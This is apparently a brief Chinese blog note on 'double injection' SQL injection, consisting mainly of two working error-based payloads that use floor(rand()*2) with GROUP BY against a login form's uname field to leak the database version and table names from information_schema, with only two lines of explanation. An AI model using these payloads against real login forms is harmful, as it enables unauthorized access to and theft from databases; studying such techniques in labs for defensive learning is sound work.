sql注入-双注入

1、判断存在注入,注入方式

2、报错、不报错

 

 

 

 

union select 无法回显

 

 

 

 uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),version())%23&passwd=123456&submit=Submit

 

 
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select table_name from information_schema.tables where table_schema=database() limit 0,1))%23&passwd=123456&submit=Submit

 

posted @ 2022-01-03 20:09  蜘蛛侠小童鞋  阅读(101)  评论(0)    收藏  举报